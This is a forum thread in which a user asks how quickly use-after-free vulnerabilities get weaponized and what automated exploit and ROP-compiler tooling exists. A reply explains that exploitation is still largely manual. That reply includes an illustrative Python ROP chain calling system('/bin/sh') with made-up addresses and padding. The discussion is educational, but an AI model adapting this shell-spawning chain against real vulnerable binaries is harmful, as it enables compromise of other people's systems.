by lopsidedBrain on 11/1/20, 2:46 AM with 1 comments
Once a typical use-after-free vulnerability is disclosed publicly, for example, how quickly does it get weaponized? I remember reading some academic papers a while back that claimed to be able to automatically generate exploits from a patch. I believe ROP compilers also exist that will take some logic and string it together from a given set of gadgets in a binary. What is the current state of all that tooling?
Bottom line: Are there stats (e.g. from honeypots) that tell us the likelihood of a typical laptop/mobile user being compromised via a given security flaw, given the amount of time they run unpatched after disclosure?
I figured there must be experts here who have been keeping up with all of this better than I have. I'd love to hear from you all!
by kdbg on 11/1/20, 9:05 PM
The process of going from a bug to a weaponized exploit is still largely manual, though. Some tooling exists that can automate certain tasks, but these tools often only work as proofs of concept. ROP compilers are a great example: they "work," but the chains they emit are usually far more prone to crashing than one assembled by hand, so they wouldn't be used in the real world.
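For context, the kind of chain a ROP compiler tries to emit automatically is easy to sketch by hand. Here's a minimal, purely illustrative x86-64 example; all addresses and the 72-byte overflow offset are made up, not taken from any real binary:

```python
import struct

# Hypothetical gadget and function addresses -- illustrative only,
# not from any real binary.
POP_RDI_RET = 0x401234   # gadget: pop rdi; ret
BIN_SH_STR  = 0x403000   # address of a "/bin/sh" string in the binary
SYSTEM_PLT  = 0x401050   # address of system() in the PLT

def p64(addr):
    """Pack an address as a little-endian 64-bit value."""
    return struct.pack("<Q", addr)

# A hand-built chain: the hijacked return lands on the gadget, which
# pops the next stack word into rdi, then its own `ret` transfers
# control to system("/bin/sh").
rop_chain = b"".join([
    p64(POP_RDI_RET),  # first return target: pop rdi; ret
    p64(BIN_SH_STR),   # word popped into rdi: pointer to "/bin/sh"
    p64(SYSTEM_PLT),   # gadget's ret jumps here: system(rdi)
])

# 72 is a hypothetical offset from the buffer to the saved return address.
payload = b"A" * 72 + rop_chain
```

The hard part a compiler struggles with isn't emitting a chain like this, it's picking gadgets whose side effects (clobbered registers, stack shifts, alignment requirements) don't break the target's state, which is exactly where hand-built chains end up more reliable.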
That's just kinda the general truth. Ignoring the many cases where the automated offerings just don't work at all, when they do work, the output is often not weaponized to a useful degree. You might think you could use that output as a starting place, but it takes a lot of time to reverse what the script did and figure out what can/should be changed, comparable to having just done it yourself in the first place without its constraints.
That said, there has been some research into augmenting the workflow by discovering exploit-strategy candidates. I forget the name right now, but there was a paper early this year presenting a capability-guided fuzzer that focused on "fuzzing" OOB write vulns to expand them and discover viable exploit strategies for them.